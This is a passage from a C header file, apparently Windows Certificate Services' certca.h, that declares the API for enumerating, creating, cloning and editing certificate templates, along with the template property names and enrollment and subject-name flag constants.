    _In_opt_ LPWSTR pwszCertTypeName
    );


//
// CARemoveCACertificateType
// Remove a certificate type from a CA.  If the CA does not include this cert
// type, this call does nothing. Either the hCertType Handle
// or the CN of the CertType must not be Null.
//
// hCAInfo      - Handle to an open CA.
//
// hCertType    - Handle to the CertType
//
// pwcszCertTypeName    - CN of the Cert Type
//

HRESULT
WINAPI
CARemoveCACertificateTypeEx(
    _In_ HCAINFO hCAInfo,
    _In_opt_ HCERTTYPE hCertType,
    _In_opt_ LPWSTR pwszCertTypeName
    );




//*****************************************************************************
//
// Certificate Type APIs
//
//*****************************************************************************

//
// CAEnumCertTypes - Retrieve a handle to all known cert types
// CAEnumNextCertType can be used to enumerate through the cert types.
//
// dwFlags              - an oring of the following:
//                        CT_FIND_LOCAL_SYSTEM
//                        CT_ENUM_MACHINE_TYPES
//                        CT_ENUM_USER_TYPES
//                        CT_FLAG_NO_CACHE_LOOKUP
//                        CT_ENUM_ADMINISTRATOR_FORCE_MACHINE
//                        CT_ENUM_NO_CACHE_TO_REGISTRY
//
// phCertType           - Enumeration of certificate types.
//


HRESULT
WINAPI
CAEnumCertTypes(
    IN  DWORD       dwFlags,
    OUT HCERTTYPE * phCertType
    );


//
// CAEnumCertTypesEx - Retrieve a handle to all known cert types
// CAEnumNextCertType can be used to enumerate through the cert types.
//
// wszScope            - NULL if use the current domain.
//                        If CT_FLAG_SCOPE_IS_LDAP_HANDLE is set, wszScope is the LDAP
//		                  binding handle to use during finds.
//
// dwFlags              - an oring of the following:
//                        CT_FIND_LOCAL_SYSTEM
//                        CT_ENUM_MACHINE_TYPES
//                        CT_ENUM_USER_TYPES
//                        CT_FLAG_NO_CACHE_LOOKUP
//                        CT_FLAG_SCOPE_IS_LDAP_HANDLE 
//                        CT_ENUM_ADMINISTRATOR_FORCE_MACHINE
//                        CT_ENUM_NO_CACHE_TO_REGISTRY
//
// phCertType           - Enumeration of certificate types.
//

HRESULT
WINAPI
CAEnumCertTypesEx(
    IN  LPCWSTR     wszScope,
    IN  DWORD       dwFlags,
    OUT HCERTTYPE * phCertType
    );


//
// CAEnumCertTypesEx2 - Retrieve a handle to all known cert types
//
// Same as CAEnumCertTypesEx, except:
// CAEnumCertTypesEx now filters out templates whose minimum client OS version
// is greater than the current OS version.
//
// CAEnumCertTypesEx2 allows the caller to specify whether to filter against
// dwClientVersion and/or dwServerVersion.
//
// dwClientVersion	- TEMPLATE_CLIENT_VER_NONE doesn't filter on client OS
//
// dwServerVersion	- TEMPLATE_SERVER_VER_NONE doesn't filter on server OS
//

HRESULT
WINAPI
CAEnumCertTypesEx2(
    IN  LPCWSTR     wszScope,
    IN  DWORD       dwFlags,
    IN  DWORD       dwClientVersion,	// TEMPLATE_CLIENT_VER_*
    IN  DWORD       dwServerVersion,	// TEMPLATE_SERVER_VER_*
    OUT HCERTTYPE * phCertType
    );


//
// CAFindCertTypeByName - Find a cert type given a Name.
//
// wszCertType  - Name of the cert type if CT_FIND_BY_OID is not set in dwFlags
//                The OID of the cert type if CT_FIND_BY_OID is set in dwFlags
//
// hCAInfo      - NULL unless CT_FLAG_SCOPE_IS_LDAP_HANDLE is set in dwFlags
//
// dwFlags      - an oring of the following
//                CT_FIND_LOCAL_SYSTEM
//                CT_ENUM_MACHINE_TYPES
//                CT_ENUM_USER_TYPES
//                CT_FLAG_NO_CACHE_LOOKUP  
//                CT_FIND_BY_OID
//                CT_FLAG_SCOPE_IS_LDAP_HANDLE -- If this flag is set, hCAInfo
//						  is the LDAP handle to use
//						  during finds.
// phCertType   - Pointer to a cert type in which result is returned.
//

HRESULT
WINAPI
CAFindCertTypeByName(
    IN  LPCWSTR     wszCertType,
    IN  HCAINFO     hCAInfo,
    IN  DWORD       dwFlags,
    OUT HCERTTYPE * phCertType
    );


//
// CAFindCertTypeByName2 - Find a cert type given a Name.
//
// Same as CAFindCertTypeByName, except:
// CAFindCertTypeByName now filters out templates whose minimum client OS
// version is greater than the current OS version.
//
// CAFindCertTypeByName2 allows the caller to specify whether to filter against
// dwClientVersion and/or dwServerVersion.
//
// dwClientVersion	- TEMPLATE_CLIENT_VER_NONE doesn't filter on client OS
//
// dwServerVersion	- TEMPLATE_SERVER_VER_NONE doesn't filter on server OS
//

HRESULT
WINAPI
CAFindCertTypeByName2(
    IN  LPCWSTR     wszCertType,
    IN  HCAINFO     hCAInfo,
    IN  DWORD       dwFlags,
    IN  DWORD       dwClientVersion,	// TEMPLATE_CLIENT_VER_*
    IN  DWORD       dwServerVersion,	// TEMPLATE_SERVER_VER_*
    OUT HCERTTYPE * phCertType
    );


//*****************************************************************************
//
// Default cert type names
//
//*****************************************************************************

#define wszCERTTYPE_USER                    L"User"
#define wszCERTTYPE_USER_SIGNATURE          L"UserSignature"
#define wszCERTTYPE_SMARTCARD_USER          L"SmartcardUser"
#define wszCERTTYPE_USER_AS                 L"ClientAuth"
#define wszCERTTYPE_USER_SMARTCARD_LOGON    L"SmartcardLogon"
#define wszCERTTYPE_EFS                     L"EFS"
#define wszCERTTYPE_ADMIN                   L"Administrator"
#define wszCERTTYPE_EFS_RECOVERY            L"EFSRecovery"
#define wszCERTTYPE_CODE_SIGNING            L"CodeSigning"
#define wszCERTTYPE_CTL_SIGNING             L"CTLSigning"
#define wszCERTTYPE_ENROLLMENT_AGENT        L"EnrollmentAgent"


#define wszCERTTYPE_MACHINE                 L"Machine"
#define wszCERTTYPE_WORKSTATION             L"Workstation"
#define wszCERTTYPE_DC                      L"DomainController"
#define wszCERTTYPE_RASIASSERVER            L"RASAndIASServer"
#define wszCERTTYPE_WEBSERVER               L"WebServer"
#define wszCERTTYPE_KDC                     L"KDC"
#define wszCERTTYPE_CA                      L"CA"
#define wszCERTTYPE_SUBORDINATE_CA          L"SubCA"
#define wszCERTTYPE_CROSS_CA				L"CrossCA"
#define wszCERTTYPE_KEY_RECOVERY_AGENT      L"KeyRecoveryAgent"
#define wszCERTTYPE_CA_EXCHANGE             L"CAExchange"
#define wszCERTTYPE_DC_AUTH                 L"DomainControllerAuthentication"
#define wszCERTTYPE_DS_EMAIL_REPLICATION    L"DirectoryEmailReplication"
#define wszCERTTYPE_OCSPRESPONSESIGNING	    L"OCSPResponseSigning"
#define wszCERTTYPE_KERB_AUTHENTICATION     L"KerberosAuthentication"


#define wszCERTTYPE_IPSEC_ENDENTITY_ONLINE      L"IPSECEndEntityOnline"
#define wszCERTTYPE_IPSEC_ENDENTITY_OFFLINE     L"IPSECEndEntityOffline"
#define wszCERTTYPE_IPSEC_INTERMEDIATE_ONLINE   L"IPSECIntermediateOnline"
#define wszCERTTYPE_IPSEC_INTERMEDIATE_OFFLINE  L"IPSECIntermediateOffline"

#define wszCERTTYPE_ROUTER_OFFLINE              L"OfflineRouter"
#define wszCERTTYPE_ENROLLMENT_AGENT_OFFLINE    L"EnrollmentAgentOffline"
#define wszCERTTYPE_EXCHANGE_USER               L"ExchangeUser"
#define wszCERTTYPE_EXCHANGE_USER_SIGNATURE     L"ExchangeUserSignature"
#define wszCERTTYPE_MACHINE_ENROLLMENT_AGENT    L"MachineEnrollmentAgent"
#define wszCERTTYPE_CEP_ENCRYPTION              L"CEPEncryption"


//
// CAUpdateCertType
// Write any changes made to the cert type back to the type store
//
HRESULT
WINAPI
CAUpdateCertType(
    IN HCERTTYPE           hCertType
    );

//
// CAUpdateCertType
// Write any changes made to the cert type back to the type store
//
// lpPara:-              is a pointer to an LDAP handle
//                           if dwFlags has CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                           and is NULL otherwise
// dwFlags:-                 CT_FLAG_SCOPE_IS_LDAP_HANDLE ,
//                                 0
//
HRESULT
WINAPI
CAUpdateCertTypeEx(
    IN  LPVOID     lpPara,
    IN  DWORD       dwFlags,
    IN HCERTTYPE           hCertType
    );



//
// CADeleteCertType
// Delete a CertType
//
// hCertType    - Cert type to delete.
//
// NOTE:  If this is called for a default cert type, it will revert back to its
// default attributes (if it has been modified)
//
HRESULT
WINAPI
CADeleteCertType(
    IN HCERTTYPE            hCertType
    );


//
// CADeleteCertType
// Delete a CertType
//
// hCertType    - Cert type to delete.
// lpPara:-              is a pointer to an LDAP handle
//                           if dwFlags has CT_FLAG_SCOPE_IS_LDAP_HANDLE
//                           and is NULL otherwise
// dwFlags:-                 CT_FLAG_SCOPE_IS_LDAP_HANDLE ,
//                                 0
//
// NOTE:  If this is called for a default cert type, it will revert back to its
// default attributes (if it has been modified)
//
HRESULT
WINAPI
CADeleteCertTypeEx(
    IN  LPVOID     lpPara,
    IN  DWORD       dwFlags,
    IN HCERTTYPE            hCertType
    );



//
// CACloneCertType
//
// Clone a certificate type.  The returned certificate type is a clone of the 
// input certificate type, with the new cert type name and display name.  By default,
// if the input template is a template for machines, all 
// CT_FLAG_SUBJECT_REQUIRE_XXXX bits in the subject name flag are turned off.  
//                                   
// hCertType        - Cert type to be cloned.
// wszCertType      - Name of the new cert type.
// wszFriendlyName  - Friendly name of the new cert type.  Could be NULL.
// pvldap           - The LDAP handle (LDAP *) to the directory.  Could be NULL.
// dwFlags          - Can be an ORing of the following flags:
//
//                      CT_CLONE_KEEP_AUTOENROLLMENT_SETTING
//                      CT_CLONE_KEEP_SUBJECT_NAME_SETTING
//
HRESULT
WINAPI
CACloneCertType(
    IN  HCERTTYPE            hCertType,
    IN  LPCWSTR              wszCertType,
    IN  LPCWSTR              wszFriendlyName,
    IN  LPVOID               pvldap,
    IN  DWORD                dwFlags,
    OUT HCERTTYPE *          phCertType
    );


#define  CT_CLONE_KEEP_AUTOENROLLMENT_SETTING       0x01
#define  CT_CLONE_KEEP_SUBJECT_NAME_SETTING         0x02  


//
// CACreateCertType
// Create a new cert type
//
// wszCertType  - Name of the cert type
//
// pvPara     - If set is the LDAP handle to the DC.
//
// dwFlags      - reserved.  Must set to NULL.
//
// phCertType   - returned cert type
//
HRESULT
WINAPI
CACreateCertType(
    IN  LPCWSTR             wszCertType,
    IN  LPVOID                pvPara,
    IN  DWORD               dwFlags,
    OUT HCERTTYPE *         phCertType
    );


//
// CAEnumNextCertType
// Find the Next Cert Type in an enumeration.
//
// hPrevCertType        - Previous cert type in enumeration
//
// phCertType           - Pointer to a handle into which result is placed.
//			  NULL if there are no more cert types in enumeration.
//

HRESULT
WINAPI
CAEnumNextCertType(
    IN  HCERTTYPE          hPrevCertType,
    OUT HCERTTYPE *        phCertType
    );


//
// CACountCertTypes
// return the number of cert types in this enumeration
//

DWORD
WINAPI
CACountCertTypes(
    IN  HCERTTYPE  hCertType
    );


//
// CACloseCertType
// Close an open CertType handle
//

HRESULT
WINAPI
CACloseCertType(
    IN HCERTTYPE hCertType
    );


//
// CAGetCertTypeProperty
// Retrieve a property from a certificate type.   This function is obsolete.
// Caller should use CAGetCertTypePropertyEx instead
//
// hCertType            - Handle to an open CertType object.
//
// wszPropertyName      - Name of the CertType property.
//
// pawszPropertyValue   - A pointer into which an array of WCHAR strings is
//			  written, containing the values of the property.  The
//			  last element of the array points to NULL.  If the
//			  property is single valued, then the array returned
//			  contains 2 elements, the first pointing to the value,
//			  the second pointing to NULL.  This pointer must be
//                        freed by CAFreeCertTypeProperty.
//
// Returns              - S_OK on success.
//

HRESULT
WINAPI
CAGetCertTypeProperty(
    IN  HCERTTYPE   hCertType,
    IN  LPCWSTR     wszPropertyName,
    _Out_ PZPWSTR  *pawszPropertyValue);

//
// CAGetCertTypePropertyEx
// Retrieve a property from a certificate type.
//
// hCertType            - Handle to an open CertType object.
//
// wszPropertyName      - Name of the CertType property
//
// pPropertyValue       - Depending on the value of wszPropertyName,
//			  pPropertyValue is either DWORD * or LPWSTR **.  
// 
//                        It is a DWORD * for:
//                          CERTTYPE_PROP_REVISION              
//                          CERTTYPE_PROP_SCHEMA_VERSION		
//                          CERTTYPE_PROP_MINOR_REVISION        
//                          CERTTYPE_PROP_RA_SIGNATURE			
//                          CERTTYPE_PROP_MIN_KEY_SIZE	
//                          CERTTYPE_PROP_SYM_KEY_LENGTH
//		
//                        It is a LPWSTR ** for:
//                          CERTTYPE_PROP_CN                    
//                          CERTTYPE_PROP_DN                    
//                          CERTTYPE_PROP_FRIENDLY_NAME         
//                          CERTTYPE_PROP_EXTENDED_KEY_USAGE    
//                          CERTTYPE_PROP_CSP_LIST              
//                          CERTTYPE_PROP_CRITICAL_EXTENSIONS   
//                          CERTTYPE_PROP_OID					
//                          CERTTYPE_PROP_SUPERSEDE				
//                          CERTTYPE_PROP_RA_POLICY				
//                          CERTTYPE_PROP_POLICY
//                          CERTTYPE_PROP_DESCRIPTION
//                          CERTTYPE_PROP_ASYM_ALG
//                          CERTTYPE_PROP_SYM_ALG
//                          CERTTYPE_PROP_HASH_ALG
//				
//                        A pointer into which an array of WCHAR strings is
//			  written, containing the values of the property.  The
//			  last element of the array points to NULL.  If the
// 			  property is single valued, then the array returned
//			  contains 2 elements, the first pointing to the value,
//			  the second pointing to NULL. This pointer must be
//                        freed by CAFreeCertTypeProperty.
//
// Returns              - S_OK on success.
//

HRESULT
WINAPI
CAGetCertTypePropertyEx(
    IN  HCERTTYPE   hCertType,
    IN  LPCWSTR     wszPropertyName,
    OUT LPVOID      pPropertyValue);


//*****************************************************************************
//
// Certificate Type properties
// 
//*****************************************************************************

//*****************************************************************************
//
//  The schema version one properties
//
//*****************************************************************************

// Common name of the certificate type
#define CERTTYPE_PROP_CN                    L"cn"

// The common name of the certificate type.  Same as CERTTYPE_PROP_CN
// This property is not settable.
#define CERTTYPE_PROP_DN                    L"distinguishedName"

// The display name of a cert type retrieved from Crypt32 ( this accounts for the locale specific display names stored in OIDs)
#define CERTTYPE_PROP_FRIENDLY_NAME         L"displayName"

// The display name of the cert type stored in the template object in DS
#define CERTTYPE_PROP_DS_DISPLAY_NAME L"dsDisplayName"

// An array of extended key usage OIDs for a cert type
// NOTE: This property can also be set by setting
// the Extended Key Usage extension.
#define CERTTYPE_PROP_EXTENDED_KEY_USAGE    L"pKIExtendedKeyUsage"

// The list of default CSPs for this cert type.
#define CERTTYPE_PROP_CSP_LIST              L"pKIDefaultCSPs"

// The list of critical extensions
#define CERTTYPE_PROP_CRITICAL_EXTENSIONS   L"pKICriticalExtensions"

// The major version of the templates
#define CERTTYPE_PROP_REVISION              L"revision"

// The description of the templates
#define CERTTYPE_PROP_DESCRIPTION           L"templateDescription"

//*****************************************************************************
//
//  The schema version two properties
//
//*****************************************************************************
// The schema version of the templates
// This property may be changed from v3 to v2 or vice versa only.
#define CERTTYPE_PROP_SCHEMA_VERSION	    L"msPKI-Template-Schema-Version"

// The minor version of the templates
#define CERTTYPE_PROP_MINOR_REVISION        L"msPKI-Template-Minor-Revision"

// The number of RA signatures required on a request referencing this template.
#define CERTTYPE_PROP_RA_SIGNATURE	        L"msPKI-RA-Signature"

// The minimal key size required
#define CERTTYPE_PROP_MIN_KEY_SIZE	        L"msPKI-Minimal-Key-Size"

// The OID of this template
#define CERTTYPE_PROP_OID		            L"msPKI-Cert-Template-OID"

// The OID of the template that this template supersedes
#define CERTTYPE_PROP_SUPERSEDE		        L"msPKI-Supersede-Templates"

// The RA issuer policy OIDs required in certs used to sign a request.
// Each signing cert's szOID_CERT_POLICIES extensions must contain at least one
// of the OIDs listed in the msPKI-RA-Policies property.
// Each OID listed must appear in the szOID_CERT_POLICIES extension of at least
// one signing cert.
#define CERTTYPE_PROP_RA_POLICY		        L"msPKI-RA-Policies"

// The RA application policy OIDs required in certs used to sign a request.
// Each signing cert's szOID_APPLICATION_CERT_POLICIES extensions must contain
// all of the OIDs listed in the msPKI-RA-Application-Policies property.
#define CERTTYPE_PROP_RA_APPLICATION_POLICY L"msPKI-RA-Application-Policies"

// The certificate issuer policy OIDs are placed in the szOID_CERT_POLICIES
// extension by the policy module.
#define CERTTYPE_PROP_POLICY		        L"msPKI-Certificate-Policy"

// The certificate application policy OIDs are placed in the
// szOID_APPLICATION_CERT_POLICIES extension by the policy module.
#define CERTTYPE_PROP_APPLICATION_POLICY    L"msPKI-Certificate-Application-Policy"


//*****************************************************************************
//
//  The schema version three properties
//
//*****************************************************************************

// The name of the asymmetric algorithm.
#define CERTTYPE_PROP_ASYM_ALG                  L"msPKI-Asymmetric-Algorithm"

// Security descriptor string for the asymmetric key.
#define CERTTYPE_PROP_KEY_SECURITY_DESCRIPTOR   L"msPKI-Key-Security-Descriptor"

// The name of the symmetric algorithm used by clients for key exchange
#define CERTTYPE_PROP_SYM_ALG                   L"msPKI-Symmetric-Algorithm" 

// Length of the symmetric key in bits
#define CERTTYPE_PROP_SYM_KEY_LENGTH            L"msPKI-Symmetric-Key-Length"

// The name of the hash algorithm used by clients
#define CERTTYPE_PROP_HASH_ALG                  L"msPKI-Hash-Algorithm"

// Private Key KeyUsage
#define CERTTYPE_PROP_KEY_USAGE                  L"msPKI-Key-Usage"

#define CERTTYPE_SCHEMA_VERSION_1	1	
#define CERTTYPE_SCHEMA_VERSION_2	(CERTTYPE_SCHEMA_VERSION_1 + 1)
#define CERTTYPE_SCHEMA_VERSION_3	(CERTTYPE_SCHEMA_VERSION_2 + 1)
#define CERTTYPE_SCHEMA_VERSION_4	(CERTTYPE_SCHEMA_VERSION_3 + 1)
#define CERTTYPE_SCHEMA_VERSION_CURRENT	CERTTYPE_SCHEMA_VERSION_4


//
// CASetCertTypeProperty
// Set a property of a CertType.  This function is obsolete.  
// Use CASetCertTypePropertyEx.
//
// hCertType            - Handle to an open CertType object.
//
// wszPropertyName      - Name of the CertType property
//
// awszPropertyValue    - An array of values to set for this property.  The
//			  last element of this array should be NULL.  For
//			  single valued properties, the values beyond the first
//			  will be ignored upon update.
//
// Returns              - S_OK on success.
//

HRESULT
WINAPI
CASetCertTypeProperty(
    IN  HCERTTYPE   hCertType,
    IN  LPCWSTR     wszPropertyName,
    _In_ PZPWSTR awszPropertyValue
    );

//
// CASetCertTypePropertyEx
// Set a property of a CertType
//
// hCertType            - Handle to an open CertType object.
//
// wszPropertyName      - Name of the CertType property
//
// pPropertyValue       - Depending on the value of wszPropertyName,
//			  pPropertyValue is either DWORD * or LPWSTR *. 
// 
//                        It is a DWORD * for:
//                          CERTTYPE_PROP_REVISION              
//                          CERTTYPE_PROP_MINOR_REVISION        
//                          CERTTYPE_PROP_RA_SIGNATURE			
//                          CERTTYPE_PROP_MIN_KEY_SIZE	
//                          CERTTYPE_PROP_SYM_KEY_LENGTH
//
//                        It is a LPWSTR * for:
//                          CERTTYPE_PROP_FRIENDLY_NAME         
//                          CERTTYPE_PROP_EXTENDED_KEY_USAGE    
//                          CERTTYPE_PROP_CSP_LIST              
//                          CERTTYPE_PROP_CRITICAL_EXTENSIONS   
//                          CERTTYPE_PROP_OID					
//                          CERTTYPE_PROP_SUPERSEDE				
//                          CERTTYPE_PROP_RA_POLICY				
//                          CERTTYPE_PROP_POLICY
//                          CERTTYPE_PROP_ASYM_ALG
//                          CERTTYPE_PROP_SYM_ALG
//                          CERTTYPE_PROP_HASH_ALG
//				
//                      - An array of values to set for this property.  The
//			  last element of this array should be NULL.  For
//			  single valued properties, the values beyond the first
//			  will be ignored upon update.
//
//      
//                      - CertType of V1 schema can only set V1 properties.
//
// Returns              - S_OK on success.
//

HRESULT
WINAPI
CASetCertTypePropertyEx(
    IN  HCERTTYPE   hCertType,
    IN  LPCWSTR     wszPropertyName,
    IN  LPVOID      pPropertyValue);


//
// CADCSetCertTypePropertyEx
// Set a property of a CertType
//
// hCertType            - Handle to an open CertType object.
//
// wszPropertyName      - Name of the CertType property
//
// pPropertyValue       - Depending on the value of wszPropertyName,
//			  pPropertyValue is either DWORD * or LPWSTR *.
// pvldap               - Pointer to an LDAP handle, reqd while
//                        setting the CN property ( when we create a new OID)  
// 
//                        It is a DWORD * for:
//                          CERTTYPE_PROP_REVISION              
//                          CERTTYPE_PROP_MINOR_REVISION        
//                          CERTTYPE_PROP_RA_SIGNATURE			
//                          CERTTYPE_PROP_MIN_KEY_SIZE	
//                          CERTTYPE_PROP_SYM_KEY_LENGTH
//
//                        It is a LPWSTR * for:
//                          CERTTYPE_PROP_FRIENDLY_NAME         
//                          CERTTYPE_PROP_EXTENDED_KEY_USAGE    
//                          CERTTYPE_PROP_CSP_LIST              
//                          CERTTYPE_PROP_CRITICAL_EXTENSIONS   
//                          CERTTYPE_PROP_OID					
//                          CERTTYPE_PROP_SUPERSEDE				
//                          CERTTYPE_PROP_RA_POLICY				
//                          CERTTYPE_PROP_POLICY
//                          CERTTYPE_PROP_ASYM_ALG
//                          CERTTYPE_PROP_SYM_ALG
//                          CERTTYPE_PROP_HASH_ALG
//				
//                      - An array of values to set for this property.  The
//			  last element of this array should be NULL.  For
//			  single valued properties, the values beyond the first
//			  will be ignored upon update.
//
//      
//                      - CertType of V1 schema can only set V1 properties.
//
// Returns              - S_OK on success.
//

HRESULT
WINAPI
CADCSetCertTypePropertyEx(
    IN  HCERTTYPE   hCertType,
    IN  LPCWSTR     wszPropertyName,
    IN  LPVOID      pPropertyValue,
    IN OPTIONAL LPVOID  pvldap
    );


//
// CAFreeCertTypeProperty
// Frees a previously retrieved property value.
//
// hCertType            - Handle to an open CertType object.
//
// awszPropertyValue     - The values to be freed.
//
HRESULT
WINAPI
CAFreeCertTypeProperty(
    IN  HCERTTYPE   hCertType,
    _In_opt_ PZPWSTR awszPropertyValue
    );


//
// CAGetCertTypeExtensions
// Retrieves the extensions associated with this CertType.
//
// hCertType            - Handle to an open CertType object.
// ppCertExtensions     - Pointer to a PCERT_EXTENSIONS to receive the result
//			  of this call.  Should be freed via a
//			  CAFreeCertTypeExtensions call.
//

HRESULT
WINAPI
CAGetCertTypeExtensions(
    IN  HCERTTYPE           hCertType,
    OUT PCERT_EXTENSIONS *  ppCertExtensions
    );


//
// CAGetCertTypeExtensionsEx
// Retrieves the extensions associated with this CertType.
//
// hCertType            - Handle to an open CertType object.
// dwFlags              - Indicate which extension to be returned.
//                        Can be an ORing of following flags:
//                          
//                          CT_EXTENSION_TEMPLATE
//                          CT_EXTENSION_KEY_USAGE
//                          CT_EXTENSION_EKU
//                          CT_EXTENSION_BASIC_CONTRAINTS
//                          CT_EXTENSION_APPLICATION_POLICY (Version 2 template only)
//                          CT_EXTENSION_ISSUANCE_POLICY  (Version 2 template only)
//                          CT_EXTENSION_OCSP_REV_NO_CHECK (Version 2 template only)
//
//                        0 means all avaiable extension for this CertType.
//
// pParam               - optional LDAP Handle
// ppCertExtensions     - Pointer to a PCERT_EXTENSIONS to receive the result
//			  of this call.  Should be freed via a
//			  CAFreeCertTypeExtensions call.
//

HRESULT
WINAPI
CAGetCertTypeExtensionsEx(
    IN  HCERTTYPE           hCertType,
    IN  DWORD               dwFlags,
    IN  LPVOID              pParam,
    OUT PCERT_EXTENSIONS *  ppCertExtensions
    );


#define     CT_EXTENSION_TEMPLATE               0x01
#define     CT_EXTENSION_KEY_USAGE              0x02
#define     CT_EXTENSION_EKU                    0x04
#define     CT_EXTENSION_BASIC_CONTRAINTS       0x08
#define     CT_EXTENSION_APPLICATION_POLICY     0x10
#define     CT_EXTENSION_ISSUANCE_POLICY        0x20
#define     CT_EXTENSION_OCSP_REV_NO_CHECK      0x40



//
// CAFreeCertTypeExtensions
// Free a PCERT_EXTENSIONS allocated by CAGetCertTypeExtensions
//
HRESULT
WINAPI
CAFreeCertTypeExtensions(
    IN  HCERTTYPE           hCertType,
    IN  PCERT_EXTENSIONS    pCertExtensions
    );

//
// CASetCertTypeExtension
// Set the value of an extension for this
// cert type.
//
// hCertType            - handle to the CertType
//
// wszExtensionId       - OID for the extension
//
// dwFlags              - Mark the extension critical
//
// pExtension           - pointer to the appropriate extension structure
//
// Supported extensions/structures
//
// szOID_ENHANCED_KEY_USAGE     CERT_ENHKEY_USAGE
// szOID_KEY_USAGE              CRYPT_BIT_BLOB
// szOID_BASIC_CONSTRAINTS2     CERT_BASIC_CONSTRAINTS2_INFO
//
// Returns S_OK if successful.
//

HRESULT
WINAPI
CASetCertTypeExtension(
    IN HCERTTYPE   hCertType,
    IN LPCWSTR wszExtensionId,
    IN DWORD   dwFlags,
    IN LPVOID pExtension
    );

#define CA_EXT_FLAG_CRITICAL   0x00000001



//
// CAGetCertTypeFlags
// Retrieve cert type flags.  
// This function is obsolete.  Use CAGetCertTypeFlagsEx.
//
// hCertType            - handle to the CertType
//
// pdwFlags             - pointer to DWORD receiving flags
//

HRESULT
WINAPI
CAGetCertTypeFlags(
    IN  HCERTTYPE           hCertType,
    OUT DWORD *             pdwFlags
    );

//
// CAGetCertTypeFlagsEx
// Retrieve cert type flags
//
// hCertType            - handle to the CertType
//
// dwOption             - Which flag to set
//                        Can be one of the following:
//                        CERTTYPE_ENROLLMENT_FLAG
//                        CERTTYPE_SUBJECT_NAME_FLAG
//                        CERTTYPE_PRIVATE_KEY_FLAG
//                        CERTTYPE_GENERAL_FLAG
//
// pdwFlags             - pointer to DWORD receiving flags
//

HRESULT
WINAPI
CAGetCertTypeFlagsEx(
    IN  HCERTTYPE           hCertType,
    IN  DWORD               dwOption,
    OUT DWORD *             pdwFlags
    );


//*****************************************************************************
//
// Cert Type Flags
//
// The CertType flags are grouped into 4 categories:
//  1. Enrollment Flags (CERTTYPE_ENROLLMENT_FLAG)     
//	2. Certificate Subject Name Flags (CERTTYPE_SUBJECT_NAME_FLAG)  
//	3. Private Key Flags (CERTTYPE_PRIVATE_KEY_FLAG)    
//	4. General Flags (CERTTYPE_GENERAL_FLAG)        
//*****************************************************************************

//Enrollment Flags
#define CERTTYPE_ENROLLMENT_FLAG            0x01

//Certificate Subject Name Flags
#define CERTTYPE_SUBJECT_NAME_FLAG          0x02

//Private Key Flags
#define CERTTYPE_PRIVATE_KEY_FLAG           0x03

//General Flags
#define CERTTYPE_GENERAL_FLAG               0x04


// Used for certenroll.idl:
// certenroll_begin -- CT_FLAG_xxxx

//*****************************************************************************
//
// Enrollment Flags:
//
//*****************************************************************************
// Include the symmetric algorithms in the requests
#define CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS			0x00000001

// All certificate requests are pended
#define CT_FLAG_PEND_ALL_REQUESTS				0x00000002

// Publish the certificate to the KRA (key recovery agent container) on the DS
#define CT_FLAG_PUBLISH_TO_KRA_CONTAINER			0x00000004
		
// Publish the resultant cert to the userCertificate property in the DS
#define CT_FLAG_PUBLISH_TO_DS					0x00000008

// The autoenrollment will not enroll for new certificate if user has a certificate
// published on the DS with the same template name
#define CT_FLAG_AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE       0x00000010

// This cert is appropriate for auto-enrollment
#define CT_FLAG_AUTO_ENROLLMENT					0x00000020

// A previously issued certificate will valid subsequent enrollment requests
#define CT_FLAG_PREVIOUS_APPROVAL_VALIDATE_REENROLLMENT         0x00000040

// Domain authentication is not required.  
#define CT_FLAG_DOMAIN_AUTHENTICATION_NOT_REQUIRED              0x00000080

// User interaction is required to enroll
#define CT_FLAG_USER_INTERACTION_REQUIRED                       0x00000100

// Add szOID_CERTTYPE_EXTENSION (template name) extension
// This flag will ONLY be set on V1 certificate templates for W2K CA only.
#define CT_FLAG_ADD_TEMPLATE_NAME		                0x00000200

// Remove invalid (expired or revoked) certificate from personal store
#define CT_FLAG_REMOVE_INVALID_CERTIFICATE_FROM_PERSONAL_STORE  0x00000400

// Allow enroll-on-behalf-of; RA requirements still apply to signers
#define CT_FLAG_ALLOW_ENROLL_ON_BEHALF_OF  			0x00000800

// Add szOID_PKIX_OCSP_NOCHECK extension 
#define CT_FLAG_ADD_OCSP_NOCHECK				0x00001000

// Used by the enrollment client only, if key generation for renewal fails
// for a smart card then renewal will re-use the existing key
#define CT_FLAG_ENABLE_KEY_REUSE_ON_NT_TOKEN_KEYSET_STORAGE_FULL	0x00002000

// Tells the CA that this certificate should not have the CDP extension and OCSP AIA extension
#define CT_FLAG_NOREVOCATIONINFOINISSUEDCERTS 0x00004000

// Tells the CA to include the Basic Constraints extension
#define CT_FLAG_INCLUDE_BASIC_CONSTRAINTS_FOR_EE_CERTS 0x00008000

// For ROBO requests of Offline templates, tells the CA to ignore AccessCheck for the following reasons.
// a) The original request may not be in the CA database as the original cert may have been issued 
//    from a different CA in the enterprise.
// b) The original requestor account\permissions may not be valid anymore but the signer cert is valid.
// c) This flag also informs a KEYONLY CEP to select and return these templates
#define CT_FLAG_ALLOW_PREVIOUS_APPROVAL_KEYBASEDRENEWAL_VALIDATE_REENROLLMENT 0x00010000

// Indicates that the Certificate Issuance Policies to be included in the issued certificate come from
// the request rather than the template.  The template contains a list of all of the issuance policies
// the request is allowed to specify -- if the request contains policies not listed in the template
// then the request is rejected.
#define CT_FLAG_ISSUANCE_POLICIES_FROM_REQUEST 0x00020000

// Indicates that the certificate should not be autorenewed although it has a valid template.  
// This flag is mainly for templates that deployed by MDM or VSC where the certificate cannot be autorenewed.
#define CT_FLAG_SKIP_AUTO_RENEWAL   0x00040000


//*****************************************************************************
//
// Certificate Subject Name Flags:
//
//*****************************************************************************

// The enrolling application must supply the subject name.
#define CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT			0x00000001

// The enrolling application must supply the subjectAltName in request
#define CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME		0x00010000

// Subject name should be full DN
#define CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH			0x80000000

// Subject name should be the common name
#define CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME			0x40000000

// Subject name includes the e-mail name
#define CT_FLAG_SUBJECT_REQUIRE_EMAIL				0x20000000

// Subject name includes the DNS name as the common name
#define CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN			0x10000000

// Subject alt name includes DNS name
#define CT_FLAG_SUBJECT_ALT_REQUIRE_DNS				0x08000000

// Subject alt name includes email name
